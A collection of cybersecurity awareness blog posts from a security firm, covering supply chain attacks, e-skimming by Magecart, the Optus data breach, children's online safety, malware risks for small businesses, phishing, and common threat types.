Logo 1 (1)

Uncovering Potential Cyber security blind spots

Supply chain attacks are an emerging threat that targets developers and suppliers of software. The main aim is to identify and get the credentials to the code source, build processes, or update mechanisms by infecting legitimate apps to distribute malware.

How supply chain attacks work

Cyber attacks hunt for unsecured network protocols, unsafe coding practices, and unprotected server infrastructures. They change codes, archive built-in malware, and update the processes as the software is built and released by trusted sources; the apps are signed and certified. In Supply Chain attacks, the origin or the vendor is not aware of updated malware infection when released to the public, and the code runs without any hassle with the same trust and permission.

The Popularity of the apps is significant, and so is the number of victims. For example, a case occurred where a free file compression app was poisoned and deployed to customers in a country where it was the top utility app.

Types of supply chain attacks

  • Compromised software building tools or updated infrastructure
  • Stolen code-sign certificates or signed malicious apps using the identity of dev company
  • Compromised specialized code shipped into hardware or firmware components.
  • Pre-installed malware on devices (cameras, USB, phones, etc.)

What can be done?

“What you don’t know can’t hurt you” may have been the oft-quoted remedy to not worrying about unknown problems. However, the strange technology footprint can create significant headaches for the organization. Therefore, one needs to live by the new maxim: “What you don’t know can hurt you.”

At an organizational level, it is crucial to acknowledge your third parties, their deployed technologies, and their underlying platforms and hardware. Apache Log4J vulnerability mentions itself as one of the classic cases. Companies were not aware of the provider system and whether they were using authentic Log4J as a part of their Product.

Some of the best practices for managing supply chain risks are:

  • A comprehensive inventory of all assets within the realm of the CIOs’ organization Shadow business applications bought by sales, marketing, quality, or shop floor environments for industrial IoT and safety.
  • Identify known third-party risks, on an ongoing basis, for not only the primary technology but the underlying platform or hardware used by the provider and plan to remediate them. Often this leads to technology upgrades with cost elements or product support issues; in such cases, near-term mitigating controls will need to be identified.
  • A process must be implemented for a periodic audit of third-party systems to identify vulnerabilities, along with a detailed source code review for gaps. Insisting on the provider to offer the same as part of the procurement process will address the heartburn later.

While the above points pertain primarily to how one interacts with third-party providers, there are a few things that one can look at doing from a hygiene perspective.

  • Limiting the number of privileged accounts: Most attackers go after these accounts to carry out significant damage, as reducing them will reduce the overall attack surface.
  • Reducing the access to sensitive data: Treat sensitive data as your crown jewel. Access to them should be restricted to a select few, and the access requests (successful/ unsuccessful) should be monitored, including geofencing.
  • Third-party vendor access: Tight control on third-party employees/contractors in terms of what they have access to, including their life cycle, needs to be implemented.
  • Control shadow IT purchases: Any purchased technology system should go through a standard security check and be included in the overall tracking inventory to avoid surprises.

In summary

The world today is running by means of technology and is connected with the strings of data, science and digital artifice. The most important thing today is data but is constantly at risk.
Millions of people and their data are joined with the weakest link that stems from that one small piece of hardware or software in a remote corner with a chance of bringing the company to a standstill. So it is high time for organizations and professionals to understand the purpose of ultimate security at every end.

Focus on this blind spot and find a way to stay abreast of risks and mitigate them.

How to have a safe and secured Online Shopping experience

E-Skimming: Online skimming hammers restaurant payment platforms as the attacker base widens

The Internet touches almost all aspects of our daily lives. We are able to shop, bank, connect with family and friends, and handle our medical records all online. These activities require you to provide personally identifiable information (PII) such as your name, date of birth, account numbers, passwords, and location information.

Skimming was once dominated by a few highly trained gangs that methodically selected and attacked their targets, modifying JavaScript on websites to steal customers’ credit card information, frequently for sale on the black market. Presently, it’s a lot more diverse group filled with cyber criminals that prey on cheap, widely accessible, and simple-to-use skimmers.

WHAT IS IT?

Cybercriminals introduce skimming codes on e-commerce payment card processing web pages to capture credit card and personally identifiable information and send the stolen data to a domain under their control.

HOW DOES IT WORK?

Skimming code is introduced to payment card processing websites by:

  • Exploiting a vulnerability in the website’s e-commerce platform
  • Gaining access to the victim’s network through a phishing email or brute force of administrative credentials
  • Compromising third-party entities and supply chains by hiding skimming code in the JavaScript loaded by the third-party service onto the victim’s website
  • Cross-site scripting redirects customers to a malicious domain where malicious JavaScript code captures their information from the checkout page.

The malicious code captures credit card data as the end user enters it in real-time. The information is then sent to an Internet-connected server using a domain name controlled by the actor. Subsequently, the collected credit card information is either sold or used to make fraudulent purchases.

WHO IS BEING TARGETED?

Who is the target of e-skimming?

Businesses—Any organization that maintains a website that collects payment information and other types of sensitive user data are at risk of an e-skimming attack. Industries targeted include retail, entertainment, travel, utility companies, and third-party vendors (such as those working in online advertising or web analytics). Cybercriminals may also target user and administrative credentials in addition to financial or credit card information.

Consumers—Consumer PII, credit card, and financial data is the primary target of e-skimming. Every year millions of individuals become victims of e-skimming attacks. 

Cybercriminals are evolving their tactics and have also been seen using malicious code that targets user and administrative credentials in addition to customer payment information.

Use case example: Magecart

Magecart is a rapidly growing cybercrime syndicate comprised of dozens of subgroups that specialize in cyberattacks involving digital credit card theft by skimming online payment forms. Magecart also refers to the JavaScript code those groups inject.

Magecart operates by operatives gaining direct or indirect access to websites and injecting malicious JavaScript that steals data entered into online payment forms, typically on checkout webpage.

Magecart operatives either directly or indirectly breach sites. Third-party code suppliers are the targets of supply chain attacks. Suppliers can include companies that integrate with websites to add or improve functionality, as well as cloud resources from which websites pull code, such as Amazon S3 Buckets. Because these third-party vendors integrate with thousands of websites, when one supplier is compromised, Magecart has effectively breached thousands of sites at once.

WHAT ARE THE WARNING SIGNS?

  • Complaints of fraudulent activity on several customers’ accounts after making a purchase from the victim company.
  • Identifying a new domain not known to be registered by the victim company.
  • JavaScript code has been edited.

 WHAT IS THE IMPACT OF AN E-SKIMMING ATTACK?  

Loss of Sensitive Customer Information: E-skimming attacks can involve the theft of multiple types of customer information, including credit card data and PII. 

Profit loss: Previous e-skimming attacks have demonstrated that business profits will be impacted negatively due to reputation damage and loss of customer trust.

Regulatory and Compliance Issues: Government and industry regulations, such as the Payment Card Industry Data Security Standards (PCI DSS) and the General Data Protection Regulations (GDPR) can subject businesses to lawsuits and fines should business customers be affected by an e-skimming attack.

 HOW CAN YOU MINIMIZE RISK?

In an attempt to make attribution, it is determined that the malicious skimmer code has varied in complexity, which limits the ability to identify a specific set of indicators of compromise.

Vulnerable companies should secure websites to prevent malicious code injection. In addition, companies should implement proper network segmentation and segregation to limit network exposure and minimize the lateral movement of cyber criminals.

  1. Perform regular updates to payment software.
  2. Use automated monitoring & inspections.
  3. Deploy and maintain content security policies.
  4. Install patches from payment platform vendors.
  5. Implement code integrity checks.
  6. Keep anti-virus software updated.
  7. Ensure you are PCI DSS compliant.
  8. Monitor and analyze web logs.
  9. Refer to your Incident Response Plan, if applicable.

In my point of aspect, “Any business must apply data-centric protection to any sensitive data within their ecosystem, including PII, financial, and transactional data, as soon as it enters the environment and keep it protected even as employees work with that data.”

Payment platforms can protect sensitive information while preserving the original data format by tokenizing any PII or transactional data, “making it easier for business applications to support tokenized data within their workflows.” “They should also review their enterprise backup and recovery strategies to ensure that they can recover quickly if hackers gain access to their environment and encrypt their enterprise data.”

Thanks for reading.

Published by: P. Sai Ram
Cyber Security Researcher
Tsarolabs

World’s biggest cybercrime so far

Optus, a leading Australian Telecommunication company, recently fell prey to Cybercrime and Data Breaching offenses.

Last Thursday, the company came forward with details of the loss. The attack exposed information including customers’ names, dates of birth, phone numbers, email addresses, and – for some – physical addresses, ID document numbers such as driving license or passport numbers. Payment details and account passwords were not compromised.

According to them, the crime has breached enough information to open a Bank account and severely damaged the company. 

Optus CEO Kelly Bayer Rosmarin stated that The incident had left the company ‘Devastated.’ 

He said, “As soon as we knew, we took action to block the attack and began an immediate investigation.”  

Rosmarin issued a statement confirming the disturbances and unusual activities on their site and started investigating the culprit and the purpose of breaching.

This accident has devastated the company. As a result, they will now impose better cyber security with personal Notification and third-party monitoring services to restrict higher risk.

The Australian Cyber Security Center, the Australian Federal Police, and the Office of the Australian Information Commissioner are working with Optus to find out the culprit and shut down specific systems to prevent further data breaches. 

Recently, the Australian Government has slammed the company for putting data belonging to 40% of the country’s population at risk. The Government has yet again criticized the second largest Telecom company, Optus, and enquired about the aftermath of the cybercrime. The crime almost affected 10 million accounts.

The Government urges the company to accelerate notification to its 10,200 customers whose personal information was breached in the offense.

Overall, if we look around, cybercrime has picked up a fast pace across the globe. It’s not only limited to the Biggies of various lines of businesses, but it also makes a troublesome journey for SMEs. 

At TSARO Labs, we believe in providing best-in-class and industry-recognized solutions to our customers by protecting them from ransomware threats and other cyber attacks.

Please write to us to know more or get the demo on Cyber Security!

connect@tsarolabs.com    

Raising DigiSmart Kids

The Internet can be excellent for kids. They can use it to attend online classes, research work and school reports, communicate with teachers and other kids, family, and friends, and play interactive games.

But online access also comes with risks, like inappropriate content, cyberbullying, and online criminals and predators. For example, some sites offer prizes to lure children by giving their email addresses and personal information of themselves and family members online. Using social media apps and websites where kids interact, criminals may pose as a child or teens looking to make a new friend. They might prod the child to exchange personal information, such as address and phone number, or encourage kids to call them, seeing their phone number via caller ID. Terrorist-themed video games are also widespread these days to disturb the mind of young children.

The Parents must be aware of what their kids see and hear online, who they meet, and what they share about themselves. Please talk with your kids, use tools to protect them, and keep an eye on their activities.

Some introductory security lessons for Parents and Children

Use Parent-Control Options

Online tools let you control your kids’ access to adult material and help protect them from Internet predators. Many Internet service providers (ISPs) provide parent-control options. You can also get software that helps block access to sites and restricts personal information from being sent online. Other programs can monitor and track online activity.

Help your child understand the Impact of Sharing Password

Learn that sharing your password gives others control of your digital footprint. Consider what can happen when someone logs in as you. Understand how someone else’s actions can affect your digital footprint and you!

What happens when you share your password?

Think about a password you’ve created for some app or device you use. Maybe it was a password to unlock your phone or to log into your favorite game or video app. Have you ever shared a password with someone else? Ok, a lot of us have. But there’s an important reason why you really should not share your passwords.

You have something called a digital footprint. A digital footprint represents you online. It’s what all the things you leave online—likes, comments, your screen name, photos, messages, recordings, etc. add up to and give other people an idea of what you’re like. It affects your reputation and how people think of you. They make guesses, or assumptions, about you based on that footprint you leave. So that’s one thing essential to be aware of when you’re online.

Another thing crucial to know is that when you share your password, you are giving someone else control of your digital footprint—you’re allowing them to help create it and shape how other people think of you. Yikes, right?! Since it’s your footprint, everybody believes you’re the one making it. So if someone with your password does something you don’t like, people will think that was you doing it! That’s why it’s super important not to share your passwords.

For example, let’s say you share your password with a friend on a social media account. While logged in as you, your friend sends a message to someone in your class like, “Can you send me your homework answers?” The next day in class, the student goes to the teacher and says you were trying to cheat on your homework by asking for answers. Then they show your teacher the message your friend sent from your account. Who do you think your teacher will believe? How does this affect your reputation? What else might happen?

Brainstorm with the class possible outcomes. Examples: Teacher calls home. You lose points on an assignment. Your digital footprint shows that you tried to cheat in school. You get into a fight with your friend who sent the message.

Remember, your digital footprint represents you online. So any time you share your password with someone, you give that person control of your digital footprint, which can impact how people see you on the Internet and everywhere else. Let’s explore this idea together.

Help your child to build a strong password.

Do’s

  • Use a different password for each of your important accounts. Use at least eight characters.
  • The longer, the better (as long as you remember it!).
  • Use combinations of letters (uppercase and lowercase), numbers, and symbols. Make your passwords memorable, so you don’t need to write them down, which would be risky.
  • Immediately change your password if you think someone else knows it (besides a parent or guardian).
  • Change your passwords now and then.
  • Always use strong screen locks on your devices. Set your devices to lock automatically if they end up in the wrong hands.
  • Consider using a password manager, such as one built into your browser, to remember your passwords. This way, you can use a unique password for each account and not have to remember them all.
  • Help your child to build a strong password.

Don’t

  • Donʼt uses personal information (name, address, email, phone number, aadhar number, mother maiden name, birth dates, or even a pet’s name, etc.) In your password.
  • Donʼt uses a password that is easy to guess, like your nickname, chocolate, just the name of your school, favorite sports team, a string of numbers (like 123456), etc. And definitely don’t use the word ‘password”!
  • Donʼt shares your password with anyone other than your parent or guardian. Never write passwords down where someone can find them.

I hope you find this information helpful. To understand online safety measures for your child, don’t hesitate to reach out to us at connect@tsarolabs.com or neha@tsarolabs.com.

5 Reasons Why Mid- & Small-size Businesses are Affected More by Malware Attacks

We read about increasing cyberattacks and the new ways cybercriminals employ to steal data, corrupt systems or gain access to a company’s database every day. Most of the news that reaches us is about large, renowned companies that have been victims of cybercrime. Malware attacks, including adware, ransomware, trojans, viruses and more, are commonly observed in business scapes all around the world. But it is pivotal to understand that while we read about big companies being the victims, mid & small-size businesses are equally the targets of cybercriminals.

The reason is simple – the data in these companies is not adequately protected, making it easy for the criminal to steal or destroy it. Malware attacks may harm these companies more due to delayed actions and lack of safety walls, affecting a big part of their resources and infrastructure. Mid & small-cap companies have become easy targets for malware attacks in the past few years.

Knowing and understanding malware will safeguard organizations from being compromised. Here’s a small guide on the types of attacks frequently faced by SMEs & MMEs:

1.  Adware

Pop-up ads or random ads on phones, emails, or certain websites may redirect the user to advertising websites, where a cybercriminal may steal all the data without consent. Not all ads are legitimate. Right awareness and careful surfing may prevent employees from falling bait to adware attacks.

2. Ransomware:

This attack may come in many forms, but it usually ends up in the user (in this case, the organization) paying a ransom to gain back access to their own data. Over 90% of ransomware attacks happen through emails. So, making the employees aware of email safety hygiene, regular data backups and storing the data on separate networks will help reduce the effect of the attack. Also, strong security suites on all computers matching international standards will help avoid and identify malware attacks altogether.

3. Credential Stealing:

Various types of malware can be used to steal the credentials of the employees and clients by cyber-criminals. Moreover, the reuse of the same credentials across multiple platforms multiplies the effect of the attack. Therefore, regularly changing the passwords, multi-factor authentication, and the use of different credentials across different platforms can help secure the company’s data to some extent.

Malware attacks can be used to take control of sensitive data, confidential information about the company or financial data. Robust cybersecurity solutions and following standard cyber hygiene will help protect the company and its resources. Our experts can always help you find the solutions and safety you are looking for. Connect with us today!

Also, remember to stay updated; as cybercriminals find new ways to attack our systems, we should adapt similarly to protect them.

Threat Hunt & Safety – Know Your Defenses against Malware

Malware is a piece of software that enters your system through an infected website, email attack, ads or apps and is designed to damage, destroy or steal data from your systems. It is malicious software and comes in the form of adware, spyware, trojans, bots, viruses or ransomware. There are preventive tools that can be used to protect you against malware.

Malware Protection

There are various anti-virus, anti-spyware and firewall security systems that are used by businesses to protect against malware. But when the software used to attack is complex and advanced, it can easily break through these systems. In such cases, multiple layers of security, as well as experts at TSARO Lab, can help you protect your systems and data optimally.

Malware Response

Once the malware enters your network and system, the first security step is to detect the breach. The next step involves identifying the type of malware and the exact software breaching your system. While anti-viruses may help with basic data breaches, advanced malware attacks will need expert intervention.

Cyber-security – A Necessity in Today’s World

The constant rise of technology in the modern world has strengthened people’s connection with cyberspace. From storing sensitive documents and personal information on cloud servers to making transactions through online banking, people’s reliance on the internet knows no
bounds. However, this increasing use of cyberspace has opened Pandora’s box of cybercriminals that pose a serious threat to cyber security.

Cyber security can be termed as the process of protecting your sensitive data, networks, systems and hardware from cyber-attacks by applying certain technologies and techniques. Cyber-attacks can happen on anyone, whether you are an average citizen or a large multinational company. Moreover, there are multiple ways in which a cybercriminal can gain access to your data. Thus, it has become necessary to make cyber security an integral part of your life.

Following are a few factors that highlight the importance of cyber security:
1. Safeguards Your Cloud Servers: Most businesses in today’s world prefer to keep their data on cloud servers due to the ease of accessibility it provides to the users. Such servers contain your personal information, bank details etc. and hence are an easy target for cybercriminals. Cyber security protects these servers from such threats.

2. Helps Maintain Reputation: If you become the victim of a cyber-attack, you lose not only your data or money but also your credibility. Cyber security can help you maintain your reputation by preventing potential attacks.

3. Defends Against Viruses: A computer virus can disrupt your entire online network and bring your business to a standstill in no time. Cyber security measures help defend your systems against virus or malware attacks.

4. Prevents Data Theft: If your sensitive data ends up in the wrong hands, it can be used to steal your money, identity, private information, business secrets etc. Cyber security solutions are necessary to detect and thwart unauthorized access and protect you from any damage.

Cyber security is no longer limited to just antivirus and firewalls in today’s world. There are different elements of cyber security like Application Security, Network Security, Information Security, End-user Security, Operational Security, Cloud Security, Disaster Recovery Planning etc. Each of these elements is unique on its own and caters to a specific area of your infrastructure. However, the end goal of all these elements is to make you impervious to cyber threats and help you recover in no time in case you fall victim to a cyber-attack.

Cyber security is an evolving process because technology is growing rapidly, and so is the never-ending urge of cybercriminals to come up with new ways to steal your data. All you can do is keep your cyber security software up to date to keep your information safe and maintain its confidentiality.

How to Identify & Avoid Phishing Scams

It’s the end of the month, and your cash reserves are running low. All you need is some money to keep you going till your next salary. During this stressful period, you receive an email or a text message that reads, “Get Instant Loan In 10 Minutes At Just 1% Interest”. You click on it because it looks ‘legitimate’ and because you need money. The corresponding link asks you to fill out your personal/bank details, and you end up doing that. Nothing happens for a few days, and then one day, you get a message that your bank balance has been wiped out!

The above example is a classic case of a Phishing scam, and millions of people around the world have fallen victim to this scam in the past few years. Phishing attacks can be considered cyberattacks from fraudsters where legitimate-looking messages are sent to people to steal their sensitive information. Cybercriminals launch a multitude of these attacks every day, and most of them end up being profitable to them.

Identifying A Phishing Attack

Cybercriminals have grown smart over the years, so it has become quite difficult for a novice to identify a phishing attack. Nowadays, scammers send messages or emails that look exactly like your trusted source or company. If you receive such an email, start by checking whether the greeting is generic or personalized. Fraudulent messages tend to have a generic greeting as they are sent randomly.

Generally, a scammer concocts a short story in order to get you to click on a link or open an
attachment. You should be alarmed if a text or mail says –

You have won a lottery
Your credentials need to be changed
You must confirm your password or personal information
There is suspicious activity or log-in attempt
Update your payment details, etc.

How To Avoid This Scam?

1. Think twice before you click: Even though a communication looks trustworthy, think before you proceed. Contact the concerned company or source if required to verify the authenticity of that message.

2. Install An Antivirus Software: Such software can be your first line of defence against a phishing scam as it detects malicious sites and sends you a warning in case you are visiting that site.

3. Use multi-factor authentication: This type of authentication requires two or more credentials for extra security, making it difficult for the spammers to log in to your account.

4. Avoid Entertaining Uninitiated Communication: If you have not started the conversation, then do not share your personal information or passwords with the sender in any case.

5. Cross-Check Your Accounts: Keep track of the activity on your account and check your bank statements regularly to identify a scam, if any.

Protecting yourself from a phishing scam is possible; all you need to be is vigilant and follow the guidelines mentioned above to enjoy a productive and stress-free time on the internet.

Understanding the Types of Cyber Threats – A Brief Summary

The digital world is expanding, and so are the cyber threats that come with it. There are many online risks, from network intrusions and privacy violations to viral phishing and malicious attacks. Consequently, no one, not even the most well-heeled companies or the most technologically-superior titans, are shielded from these cyber threats.

Simply put, cyber or cybersecurity threats are deliberate attempts to damage, steal, or disrupt digital life in some way. DoS attacks, computer viruses, data breaches are some of the most common types of cyber-attacks that you would have heard of. For organizations, regulatory fines, litigations, reputational harm, and disruptions to business continuity are all potential consequences of cyberattacks, in addition to massive financial losses. Today, individuals and enterprises are always at the risk of losing their confidential information and vital assets to cybercriminals who continue to use increasingly sophisticated technologies.

Despite the fact that the number and variety of cyber threats are always mounting, there are a few that modern businesses should be mindful of. The most common types include:

– Malware: Malware is computer software that performs harmful actions on a network or
a device, such as distorting information or gaining access to a system

– Ransomware: Malware known as ‘ransomware’ uses encryption to hold a victim’s data hostage until a ransom is paid. The cybercriminal demands a ransom to decrypt the databases, files or apps that have been encrypted.

– Data Breaches: A data breach occurs when an unauthorized intruder gains access to secret, sensitive, or otherwise protected information

– Trojans: Malicious software that appears to be legal but can take over your computer is called a ‘Trojan’ or ‘Trojan horse. A Trojan horse corrupts, destroys, robs, or in some way damages your data or system. To dupe you, a Trojan disguises itself smartly as harmless.

– Phishing: An email, instant chat, or text message scam when an attacker poses as a well-known company or person to access personal information such as email passwords, credit card details etc., refers to phishing. Scammers attempt to get access to personal information by sending communications that look legitimate.

– Man in the Middle Attack: A cyber thief can get in between a machine and a server to steal data. This is more like eavesdropping in the digital world.

– Denial-of-Service (DoS) Attack: DoS assaults occur when a hostile event seeks to disrupt the availability of an asset. Many different kinds of attacks fall under this umbrella category.

A wide range of individuals, sites and circumstances might pose a threat to your cyber safety and security. By adopting robust and proactive countermeasures and evolving security measures faster, people and organizations can become more self-aware in protecting personal and sensitive information. A safe and orderly digital environment necessitates the presence of good cyber security. While you go digital, stay cyber safe!

Get a Consultation

Discover the many ways to enhance your organization security posture with TSARO Labs
Select service*